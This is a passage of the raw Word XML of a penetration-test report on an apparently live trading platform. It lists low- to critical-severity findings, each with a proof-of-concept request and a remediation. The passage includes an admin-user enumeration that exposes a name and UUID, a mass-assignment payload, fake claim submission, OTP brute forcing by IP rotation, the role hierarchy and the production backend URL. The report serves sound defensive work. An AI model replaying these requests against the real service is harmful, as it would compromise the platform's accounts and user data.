      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Don't expose user UUIDs to non-admin users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="256BEB"/>
        </w:rPr>
        <w:t>L4: Squad Merchant Identity Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="256BEB"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: LOW  |  CWE: CWE-200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Squad checkout pages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Merchant name "Nairedu Prime Hub" exposed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Squad checkout page reveals merchant identity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>&lt;title&gt;Payment of NGN4,000&lt;/title&gt;</w:t>
        <w:br/>
        <w:t>&lt;meta name="description" content="... Nairedu Prime Hub"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Configure Squad to not expose merchant name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="256BEB"/>
        </w:rPr>
        <w:t>L5: Telegram Web Connect Error Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="256BEB"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: LOW  |  CWE: CWE-209</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/telegram/web/connect-start</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Confirms Telegram integration is functional</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Error message reveals the endpoint exists and is functional.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /telegram/web/connect-start → 500 "connect_start_failed"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Return generic error without revealing implementation details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="256BEB"/>
        </w:rPr>
        <w:t>L6: Downtime Claim Fraud — No Ownership Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="256BEB"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: LOW  |  CWE: CWE-863</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/downtime-claims/submit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Any user can submit claims for accounts they don't own</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Downtime claims accept any account number with just a screenshot as proof. No verification the user owns the account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/downtime-claims/submit (FormData)</w:t>
        <w:br/>
        <w:t>{old_account_number: "MP50k-FAKE123", challenge_type: "50k",</w:t>
        <w:br/>
        <w:t xml:space="preserve"> order_date: "2026-06-28", description: "Test", proof: &lt;file&gt;}</w:t>
        <w:br/>
        <w:t>→ 200 {"success":true,"claim":{"id":43,"status":"pending"}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Verify account ownership before accepting claims</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="256BEB"/>
        </w:rPr>
        <w:t>L7: Client-Errors Endpoint Log Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="256BEB"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: LOW  |  CWE: CWE-20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/client-errors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Arbitrary data injection into error logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Accepts any JSON — could be used for log injection/storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/client-errors {"arbitrary":"data"} → 204 (accepted, no validation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Validate and sanitize client error reports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Additional Findings (Post-Initial Report)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C25: User Search PII Enumeration (Full Admin Details)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-200, CWE-639</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>GET /api/ecosystem/users/search?q={query}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Full PII for ALL users including admins — zero authorization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The ecosystem user search endpoint returns full user details for ANY query. Returns full names, email hints, user IDs, XP, telegram status, account status.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>GET /api/ecosystem/users/search?q=shai</w:t>
        <w:br/>
        <w:t>→ [{"userId":"4609e821-29c9-43f6-8b54-1b7c4cf3cf1f",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "fullName":"Shai Admin","email":"s***@nairaprop.com",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "telegramLinked":true,"xp":18250}]</w:t>
        <w:br/>
        <w:br/>
        <w:t>All 4 admins enumerated + 177+ regular users searchable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Restrict search to name-only results, require admin role for detailed PII</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C26: Complete Role Hierarchy Leaked via 30+ Admin Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>30+ admin endpoints tested</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Full role hierarchy with granular permission details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Systematic probing of admin endpoints reveals the complete role hierarchy with per-endpoint permission requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>super_admin &gt; developer &gt; head_of_ops &gt; admin &gt; co_founder &gt; support &gt; user</w:t>
        <w:br/>
        <w:br/>
        <w:t>Per-endpoint requirements:</w:t>
        <w:br/>
        <w:t>/admin/dev/env/safe → super_admin OR developer</w:t>
        <w:br/>
        <w:t>/admin/sessions/all → super_admin ONLY</w:t>
        <w:br/>
        <w:t>/admin/rbac/permissions → super_admin ONLY</w:t>
        <w:br/>
        <w:t>/admin/ops/pool-health → super_admin, head_of_ops, admin, developer</w:t>
        <w:br/>
        <w:t>/downtime-claims/admin/list → admin OR support</w:t>
        <w:br/>
        <w:t>/verification/admin/pending-submissions → admin OR support</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Return generic 403 without role information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H18: 2FA Based on Email (Not TOTP) — Bypassable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-308</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/auth/2fa/enable/start</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Email-based second factor is vulnerable to interception</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2FA system uses email for second factor verification, not TOTP. If email is compromised, 2FA is completely bypassed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/auth/2fa/enable/start</w:t>
        <w:br/>
        <w:t>→ {"error":"Please verify your email first — that email is the second factor."}</w:t>
        <w:br/>
        <w:t>→ 2FA = receiving an email, not a real authenticator app</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Implement TOTP-based 2FA as primary second factor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H19: Mass Assignment on PUT /api/profile (5 Fields)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-915</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>PUT /api/profile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Arbitrary field injection — 5 fields confirmed writable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>PUT /api/profile accepts arbitrary fields. Role and emailVerified silently dropped, but 5 fields confirmed persistable: phone, state, isAffiliate, affiliateStatus, and potentially others.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>PUT /api/profile</w:t>
        <w:br/>
        <w:t>{"phone":"08099999999","state":"FCT","isAffiliate":true,"affiliateStatus":"active"}</w:t>
        <w:br/>
        <w:t>→ 200 (all persisted)</w:t>
        <w:br/>
        <w:br/>
        <w:t>GET /api/auth/me → confirms: phone, state, isAffiliate, affiliateStatus all changed</w:t>
        <w:br/>
        <w:t>Note: "role" silently dropped, "emailVerified" silently dropped</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Implement strict field whitelist, reject unknown fields</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CA8A04"/>
        </w:rPr>
        <w:t>M7: Password Reset Backend ReferenceError</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CA8A04"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: MEDIUM  |  CWE: CWE-209</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/auth/forgot-password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Leaked backend error confirms account + reveals tech stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Backend ReferenceError leaked in response — confirms real account when email delivery fails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/auth/forgot-password {"email":"real-account@broken-email.com"}</w:t>
        <w:br/>
        <w:t>→ 500 {"error":"result is not defined"}</w:t>
        <w:br/>
        <w:t>→ Confirms account exists + reveals Node.js backend error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Fix backend error handling, return same response for all inputs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CA8A04"/>
        </w:rPr>
        <w:t>M8: OTP Rate Limiting Too Aggressive (1 Attempt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CA8A04"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: MEDIUM  |  CWE: CWE-307</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/auth/verify-otp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>429 after 1 wrong attempt but brute force still viable with IP rotation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Only 1 OTP verify attempt before 429 lockout per IP. But OTP is 6-digit (1M combinations) and IP rotation defeats the lockout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /auth/verify-otp {otp: "000001"} → 200 (if correct)</w:t>
        <w:br/>
        <w:t>POST /auth/verify-otp {otp: "000002"} → 429 (rate limited)</w:t>
        <w:br/>
        <w:t>→ With IP rotation: 1M attempts needed for 6-digit OTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Implement account-level (not IP-level) OTP rate limiting, add exponential backoff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Infrastructure Intelligence Gathered</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="2880"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Backend Hosting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Railway (London edge: lhr1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>X-Hikari-Trace + X-Railway-Edge headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Backend URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>elite-prop-master-production.up.railway.app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Gateway callback_url field</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
